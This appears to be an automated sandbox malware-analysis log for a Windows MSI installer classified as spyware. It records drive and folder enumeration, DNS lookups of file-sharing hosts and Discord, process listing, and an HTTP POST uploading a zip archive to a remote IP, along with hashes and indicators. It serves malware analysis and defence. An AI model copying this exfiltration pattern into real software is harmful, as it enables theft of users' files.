Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 104.26.0.18 104.26.0.18
Source: Joe Sandbox View	IP Address: 45.55.107.24 45.55.107.24

Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	TCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: oshi.at
Source: global traffic	DNS traffic detected: DNS query: tempfile.me
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: file.io
Source: global traffic	DNS traffic detected: DNS query: zerostone.discloud.app
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /storage HTTP/1.1Accept: application/json, text/plain, */*Content-Type: multipart/form-data; boundary=--------------------------811102546146319774698210User-Agent: axios/1.7.2Content-Length: 2829Accept-Encoding: gzip, compress, deflate, brHost: 92.246.138.20Connection: closeData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 31 31 31 30 32 35 34 36 31 34 36 33 31 39 37 37 34 36 39 38 32 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 36 61 30 61 63 34 39 64 2d 30 34 38 30 2d 36 65 34 33 2d 39 39 36 36 2d 64 37 61 61 32 37 61 62 37 65 37 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a Data Ascii: ----------------------------811102546146319774698210Content-Disposition: form-data; name="file"; filename="6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip"Content-Type: application/zip

Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: ca.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u
Source: ca.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=caCtrl$1
Source: fil.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=filCtrl$1
Source: nb.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u
Source: nb.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=noCtrl$1
Source: sv.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=sv&category=theme81https://myactivity.google.com/myactivity/?u
Source: sv.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=svCtrl$1
Source: uk.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=uk&category=theme81https://myactivity.google.com/myactivity/?u
Source: uk.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=ukCtrl$1
Source: vi.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u
Source: vi.pak.1.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=viCtrl$1
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://myactivity.google.com/
Source: uk.pak.1.dr	String found in binary or memory: https://passwords.google.com
Source: ca.pak.1.dr	String found in binary or memory: https://passwords.google.comCompte
Source: nb.pak.1.dr	String found in binary or memory: https://passwords.google.comGoogle-kontoLagrede
Source: sv.pak.1.dr	String found in binary or memory: https://passwords.google.comGoogle-kontoSparade
Source: vi.pak.1.dr	String found in binary or memory: https://passwords.google.comT
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://policies.google.com/
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: sv.pak.1.dr, nb.pak.1.dr, uk.pak.1.dr, vi.pak.1.dr, ca.pak.1.dr, fil.pak.1.dr	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: uk.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: ca.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlA&judaGestionat
Source: sv.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&j
Source: nb.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&jelpAdministreres
Source: vi.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlT&r
Source: fil.pak.1.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlT&ulongPinapamahalaan

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: Conhost.exe	Process created: 67
Source: cmd.exe	Process created: 62

System Summary

Drops large PE files

Source: C:\Windows\System32\msiexec.exe

File dump: Setup.exe.1.dr 172671488

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\48ea52.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{8C7A072A-3005-48F5-AE5F-6D02D608DF59}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFB59.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\48ea54.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\48ea54.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\48ea54.msi

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00401000

7_2_00401000

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe 44658DFE810B7ED62417582A94781510E4B32E74A1B00D63941B390C0CCAA5A1

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: String function: 004029C7 appears 72 times

Source: libEGL.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: Setup.exe.1.dr	Static PE information: Number of sections : 15 > 10

Source: classification engine

Classification label: mal72.spyw.winMSI@314/112@10/9

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00402160 CoCreateInstance,MultiByteToWideChar,

7_2_00402160

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFF43EE97D80F6FDD0.TMP

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\where.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
